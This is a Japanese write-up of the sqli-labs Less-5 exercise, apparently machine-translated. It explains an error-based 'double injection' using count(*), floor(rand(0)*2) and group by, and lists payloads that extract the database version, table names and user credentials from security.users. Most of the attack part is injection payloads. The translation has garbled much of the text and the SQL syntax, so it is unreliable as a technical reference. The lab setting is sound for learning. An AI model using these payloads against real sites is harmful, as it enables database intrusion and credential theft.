あまり-5 GET - ダブルインジェクション - シングル引用符 - 文字列
1.元のページ
2.?ID = 1つの
入力されていない正しくクエリのデータベースが、直接あなたがで...されている返す
エラーを作成するので、私たちは情報を表示します。
3.?id=1 '
' '1''LIMIT 0,1' - >(一重引用符を除去するため) -入力= 1 '1''LIMIT 0,1>我々が入力ID = 1であるので、' input'LIMIT「それはのように決定することができる」0,1
SQL:
選択login_nameに、管理者ID =「入力」リミット0,1からのパスワード。
すなわち選択し、2つのネストされたクエリという...(選択...)4.ダブルチェック。それは、サブ選択クエリの実行順序と呼ばれる内部の最初のサブクエリを実行し、その後、選択の外で実行されます。別のエラーを修正するとき、連結()[文字列接続機能]エラー情報における接続の正しい結果を使用することができ
ダブルインジェクションは、主にいくつかの機能が含まれます。
- 0と1の間の値を返す関数rand()ランダム関数
- 床()丸め関数、戻り以下、最も近い整数の値
- 合計数()集約関数は、クエリオブジェクトを返します。
- GROUP BY句のクエリパケットの結果に応じて、文のグループ化
:原理を考えると
、フロアによって表からSELECT COUNT(*)グループ(RAND(0)* 2)
フロア値は、(RAND(0)* 2)、それは完全にランダムな、定性的ではなく、擬似ランダム、値011011であります
実行処理:
最初:床によってグループ(0)、 0によって基、 ノースキップ
秒:グループ1
サード:グループ1により、キー値に対応するため、
第0によって基
第五:群1、無挿入することによって、= 1キー及び前競合エラーになり、1の新しいキー値を作成します。
実行床(RAND(0)* 2)クエリを実行するために5回、3回。
:基本ルーチン
SELECT COUNT(*)、連結(([サブクエリがここに書く])、床(RAND()によって[TABLE_NAME]から基等* 2))。
データベースへのアクセス
?ID = 0組合1を選択し 、COUNT(*)、CONCAT((選択CONCAT(バージョン()、0x3a、0x3a、データベース()、0x3a、0x3a、ユーザー()、0x3a)リミット0,1 )、床(RAND(0)* 2))AS A INFORMATION_SCHEMA.TABLESからグループによるA - +
6捕捉テーブル
?ID = 0組合は、1を選択し 、(*)カウント、Aとして(TABLE_SCHEMA =データベース())、床(RAND(0)* 2)INFORMATION_SCHEMA.TABLESから(セレクト連結(TABLE_NAME、0x3a、0x3a))連結INFORMATION_SCHEMA.TABLES群から- +
リターンだけでなく、複数のデータ、リミット制限するために使用されます
?ID = 0組合は、1を選択し 、COUNT(*)TABLE_SCHEMA =データベース()限界0,1 INFORMATION_SCHEMA.TABLESから、連結((セレクト連結(TABLE_NAME、0x3a、0x3a))、床(RAND(0)* 2 ))によってINFORMATION_SCHEMA.TABLES群からよう + -
表示の他のテーブル、限界値を変更することができます
?ID = 0組合は、1を選択し、COUNT(*)TABLE_SCHEMA =データベース()限界1,1 INFORMATION_SCHEMA.TABLESから、連結((セレクト連結(TABLE_NAME、0x3a、0x3a))、床(RAND(0)* 2 ))によってINFORMATION_SCHEMA.TABLESから基として - +
7.ユーザー情報を取得します
?security.usersからID = 0組合1を選択し、COUNT(*)、CONCAT((選択CONCAT(ユーザ名、0x3a、0x3a、パスワード、0x3a、0x3a)が1,1を制限する)、床(RAND(0)* 2 ))によってINFORMATION_SCHEMA.TABLESから基として - +
?security.usersからID = 0組合1を選択し、COUNT(*)、CONCAT((選択CONCAT(ユーザ名、0x3a、0x3a、パスワード、0x3a、0x3a)が3,1を制限する)、床(RAND(0)* 2 ))によってINFORMATION_SCHEMA.TABLESから基として - +
誤解やローカルな表現が間違っている場合、私を修正してください、より多くの理解と方法はほとんどのオーナー。